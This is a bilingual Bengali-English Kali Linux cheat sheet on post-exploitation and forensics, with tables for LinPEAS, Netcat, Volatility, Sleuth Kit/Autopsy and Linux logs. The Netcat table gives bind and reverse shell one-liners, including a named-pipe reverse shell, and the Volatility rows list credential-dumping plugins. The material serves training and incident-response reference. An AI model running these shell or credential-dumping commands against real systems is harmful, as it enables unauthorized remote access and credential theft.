LinPEAS/WinPEAS, Netcat/Socat, Chisel Tunneling, Privilege Escalation techniques, Volatility Memory Forensics, Autopsy Disk Forensics, Log Analysis — Post-Exploitation থেকে Incident Response পর্যন্ত সম্পূর্ণ reference। LinPEAS/WinPEAS, Netcat/Socat, Chisel Tunneling, Privilege Escalation, Volatility Memory Forensics, Autopsy, Log Analysis — complete reference from Post-Exploitation to Incident Response.
| Flag | কাজFunction |
|---|---|
| -a | সব checks চালাও (slow কিন্তু thorough)Run all checks (slow but thorough) |
| -s | Super fast mode (কম check)Super fast mode (fewer checks) |
| -o section | শুধু নির্দিষ্ট section চালাও (SysI, UsrI, SofI, NetI, FilI, ProI)Run only specific section |
| -d | Extra checks — directory permissions ইত্যাদিExtra checks — directory permissions etc. |
| -D | Debug modeDebug mode |
| -P password | Current user password দাও (sudo check-এর জন্য)Provide current user password (for sudo checks) |
| -q | Quiet mode — কম noiseQuiet mode — less noise |
Highly probable PE vector — সবার আগে এগুলো দেখো। SUID files, writable paths, sudo misconfigs।Highly probable PE vector — look at these first. SUID files, writable paths, sudo misconfigs.
Interesting information — manually check করো। Config files, cron jobs, network info।Interesting info — check manually. Config files, cron jobs, network info.
General system info — reference হিসেবে রাখো।General system info — keep for reference.
Normal/expected output — সাধারণত ignore করো।Normal/expected output — generally ignore.
| কমান্ডCommand | কাজFunction |
|---|---|
| nc -lvnp 4444 | TCP listener চালাও (-l=listen, -v=verbose, -n=no dns, -p=port)Start TCP listener |
| nc 192.168.1.5 4444 | TCP connection করোConnect via TCP |
| nc -lvnp 4444 -e /bin/bash | Bind shell — port খুলে bash দাওBind shell — open port and serve bash |
| nc host port -e /bin/bash | Reverse shell পাঠাওSend reverse shell |
| nc -lvnp 4444 > file.txt | Incoming data file-এ save করোSave incoming data to file |
| nc host port < file.txt | File পাঠাওSend file |
| nc -zv host 1-1000 | Port scan করোPort scan |
| nc -u host 53 | UDP connection করোUDP connection |
| nc -w 5 host port | 5 second timeout সেট করোSet 5 second timeout |
| rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc host port >/tmp/f | Named pipe দিয়ে reverse shell (OpenBSD nc)Reverse shell via named pipe (OpenBSD nc) |
| Plugin (Vol3) | Plugin (Vol2) | কাজFunction |
|---|---|---|
| windows.pslist | pslist | Running processes দেখাও (EPROCESS list থেকে)Show running processes (from EPROCESS list) |
| windows.pstree | pstree | Process tree দেখাও (parent-child relationship)Show process tree (parent-child) |
| windows.psscan | psscan | Pool scanning — hidden process খোঁজোPool scanning — find hidden processes |
| windows.dlllist | dlllist | Process-এর loaded DLL দেখাওShow loaded DLLs for a process |
| windows.cmdline | cmdline | প্রতিটি process-এর command line arguments দেখাওShow command line args for each process |
| windows.handles | handles | Open handles দেখাওShow open handles |
| windows.malfind | malfind | Injected code/malware খোঁজো (suspicious memory)Find injected code/malware (suspicious memory) |
| windows.memmap | memmap | Process memory map দেখাওShow process memory map |
| windows.procdump | procdump | Process executable disk-এ dump করোDump process executable to disk |
| windows.memdump | memdump | Process memory সম্পূর্ণ dump করোDump entire process memory |
| Plugin (Vol3) | Plugin (Vol2) | কাজFunction |
|---|---|---|
| windows.netstat | netscan | Network connections দেখাও (active + closed)Show network connections (active + closed) |
| windows.netstat | connections | Active TCP connections (WinXP/2003)Active TCP connections (WinXP/2003) |
| windows.netstat | connscan | Connection pool scan (terminated সহ)Connection pool scan (including terminated) |
| Plugin (Vol3) | Plugin (Vol2) | কাজFunction |
|---|---|---|
| windows.filescan | filescan | Memory-তে থাকা file objects খোঁজোFind file objects in memory |
| windows.dumpfiles | dumpfiles | Memory থেকে file extract করোExtract files from memory |
| windows.registry.hivelist | hivelist | Registry hives দেখাওList registry hives |
| windows.registry.printkey | printkey | Registry key value দেখাওShow registry key value |
| windows.registry.userassist | userassist | Recently accessed programs দেখাওShow recently accessed programs |
| Plugin (Vol3) | Plugin (Vol2) | কাজFunction |
|---|---|---|
| windows.hashdump | hashdump | SAM database থেকে password hash dump করোDump password hashes from SAM database |
| windows.lsadump | lsadump | LSA secrets dump করোDump LSA secrets |
| windows.cachedump | cachedump | Cached domain credentials dump করোDump cached domain credentials |
| windows.clipboard | clipboard | Clipboard data দেখাওShow clipboard data |
| কমান্ডCommand | কাজFunction |
|---|---|
| mmls disk.img | Partition table দেখাওShow partition table |
| fsstat -o 2048 disk.img | File system info দেখাওShow file system info |
| fls -r -o 2048 disk.img | সব files ও directories list করো (deleted সহ)List all files and dirs (including deleted) |
| fls -r -d -o 2048 disk.img | শুধু deleted files দেখাওShow only deleted files |
| icat -o 2048 disk.img [inode] | Inode দিয়ে file content দেখাও / recover করোView/recover file by inode |
| ils -o 2048 disk.img | Inode information দেখাওShow inode information |
| tsk_recover disk.img /output/ | Recoverable files extract করোExtract recoverable files |
| tsk_gettimes -o 2048 disk.img > timeline.txt | File timeline তৈরি করোCreate file timeline |
| mactime -b timeline.txt -d > readable.csv | Human-readable timeline তৈরি করোCreate human-readable timeline |
| Autopsy Feature | কাজFunction |
|---|---|
| Add Data Source | Disk image, folder, বা VM import করোImport disk image, folder, or VM |
| File Analysis | File system browse, hex view, metadata দেখোBrowse file system, hex view, view metadata |
| Keyword Search | Text string, regex দিয়ে সব file search করোSearch all files by text string or regex |
| Deleted Files | Deleted file recover করোRecover deleted files |
| Timeline Analysis | File activity timeline দেখোView file activity timeline |
| Hash Sets | Known malware hash দিয়ে file match করোMatch files against known malware hashes |
| Web Artifacts | Browser history, cookies, downloads দেখোView browser history, cookies, downloads |
| Email Analysis | Email files parse করোParse email files |
| Report Generation | HTML/PDF report তৈরি করোGenerate HTML/PDF report |
| Log File | কাজFunction | গুরুত্ব |
|---|---|---|
/var/log/auth.log | SSH login, sudo, authentication events | Critical |
/var/log/syslog | General system messages | High |
/var/log/kern.log | Kernel messages | Medium |
/var/log/apache2/access.log | Apache web access log | Critical |
/var/log/apache2/error.log | Apache error log | High |
/var/log/nginx/access.log | Nginx access log | Critical |
/var/log/mysql/mysql.log | MySQL query log | High |
/var/log/cron | Cron job execution log | High |
/var/log/btmp | Failed login attempts (binary) | Critical |
/var/log/wtmp | Login/logout history (binary) | High |
/var/log/lastlog | Last login per user (binary) | Medium |
/root/.bash_history | Root's command history | Critical |
| কমান্ডCommand | কাজFunction |
|---|---|
| journalctl | সব system logs দেখাওShow all system logs |
| journalctl -f | Live log follow করোFollow logs live |
| journalctl -u ssh | SSH service logs দেখাওShow SSH service logs |
| journalctl -p err | Error level logs দেখাওShow error level logs |
| journalctl --since "1 hour ago" | গত ১ ঘণ্টার logs দেখাওShow logs from last 1 hour |
| journalctl --since "2024-01-01" --until "2024-01-02" | নির্দিষ্ট সময়ের logs দেখাওShow logs for specific time range |
| journalctl -n 100 | শেষ ১০০ লাইন দেখাওShow last 100 lines |
| journalctl _UID=1000 | নির্দিষ্ট UID-এর logsLogs for specific UID |
🎉 Kali Linux Series — সম্পূর্ণ!
সিরিজের সব Part সফলভাবে শেষ হয়েছে।All parts of the series successfully completed.
🐧 "The best security professional is the one who thinks like an attacker and defends like a guardian."
সব কিছু authorized environment-এ practice করো। Permission ছাড়া কোনো system-এ attack করা সম্পূর্ণ illegal।Practice in authorized environments only. Attacking systems without permission is completely illegal.
Kali Linux Series — Part 5 | v1.0 | Post-Exploitation & Forensics